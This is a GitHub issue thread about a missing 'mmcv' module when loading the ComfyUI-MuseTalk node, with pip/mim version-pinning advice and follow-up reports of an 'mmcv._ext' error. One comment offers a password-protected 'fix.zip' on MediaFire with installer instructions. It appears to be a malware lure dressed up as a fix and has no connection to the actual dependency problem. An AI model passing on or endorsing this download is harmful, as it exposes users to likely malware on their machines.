### ISSUE TITLE
ModuleNotFoundError: No module named 'mmcv'

### ISSUE THREAD

**Issue by GFY2000** [TMElyralab/MuseTalk#180]
Traceback (most recent call last):
  File "/meta/AigcPainting/ComfyUI/nodes.py", line 1982, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "/meta/AigcPainting/ComfyUI/custom_nodes/ComfyUI-MuseTalk/__init__.py", line 1, in <module>
    from .nodes import NODE_CLASS_MAPPINGS
  File "/meta/AigcPainting/ComfyUI/custom_nodes/ComfyUI-MuseTalk/nodes.py", line 26, in <module>
    from musetalk.utils.preprocessing import get_landmark_and_bbox,read_imgs,coord_placeholder
  File "/meta/AigcPainting/ComfyUI/custom_nodes/ComfyUI-MuseTalk/musetalk/utils/preprocessing.py", line 10, in <module>
    from mmpose.apis import inference_topdown, init_model
  File "/root/anaconda3/envs/comfyui-311/lib/python3.11/site-packages/mmpose/__init__.py", line 2, in <module>
    import mmcv
ModuleNotFoundError: No module named 'mmcv'

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aaaastark** [comment]
Install these packages in your virtual environment for Torch 2.2.2 of cuda121 or cuda118.

pip install openmim==0.3.9

mim install mmengine==0.10.4
mim install mmcv==2.1.0
mim install mmdet==3.2.0
mim install mmpose==1.3.2

**Comment by noob8boi** [comment]
> Install these packages in your virtual environment for Torch 2.2.2 of cuda121 or cuda118.
> 
> pip install openmim==0.3.9
> 
> mim install mmengine==0.10.4 mim install mmcv==2.1.0 mim install mmdet==3.2.0 mim install mmpose==1.3.2

i am getting `ModuleNotFoundError: No module named 'mmcv._ext'`. May i get your full installation setup?

**Comment by gangxu822** [comment]
> > Install these packages in your virtual environment for Torch 2.2.2 of cuda121 or cuda118.
> > pip install openmim==0.3.9
> > mim install mmengine==0.10.4 mim install mmcv==2.1.0 mim install mmdet==3.2.0 mim install mmpose==1.3.2
> 
> i am getting `ModuleNotFoundError: No module named 'mmcv._ext'`. May i get your full installation setup?

你解决了吗？我也遇到了
